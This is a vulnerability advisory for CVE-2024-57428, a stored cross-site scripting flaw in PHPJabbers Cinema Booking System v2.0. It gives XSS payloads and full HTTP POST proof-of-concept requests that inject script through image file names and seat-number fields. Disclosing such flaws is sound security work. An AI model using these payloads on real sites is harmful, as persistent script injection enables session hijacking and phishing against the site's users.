CVE-2024-57428: PHPJabbers Cinema Booking System v2.0 suffers from stored XSS, enabling persistent JavaScript injection for phishing and malware attacks. # CVE-2024-57428
A stored cross-site scripting (XSS) vulnerability in PHPJabbers Cinema Booking System v2.0 exists due to unsanitized input in file upload fields (event_img, seat_maps) and seat number configurations (number[new_X] in pjActionCreate). Attackers can inject persistent JavaScript, leading to phishing, malware injection, and session hijacking.
Vulnerable Parameter: ```event_img``` and ```seat_maps's file name```
## Impact:
Stored XSS is more severe than reflective XSS, as it affects all users who access the injected content. It could be leveraged for persistent phishing attacks, session theft, or injecting malware onto a large user base.
## Exploit - Proof of Concept (POC)
### Stored Cross-Site Scripting (XSS)
### File Upload Stored XSS
Payload: ```\"><img src=a onerror=alert(1)>```
```
POST /CinemaBookingDev/index.php?controller=pjAdminEvents&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 38611
[SNIP]
------WebKitFormBoundaryKOsvqJhAGpZAt33t
Content-Disposition: form-data; name="event_img"; filename="luffy.jpg\"><img src=a onerror=alert(1)>"
Content-Type: image/jpeg
```
### CINEMA HALL SEAT NUMBER
Payload: ```"><script>alert(x)</script>```
```
POST /CinemaBookingDev/index.php?controller=pjAdminVenues&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 1812
[SNIP]
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="seats_count"
11
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_1]"
1"><script>alert(1)</script>1
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_2]"
2"><script>alert(2)</script>2
```
[4.0K] /data/pocs/eb7cdb820ca7f7b679bebe1ae85a939a6ab90b92
└── [1.6K] README.md
0 directories, 1 file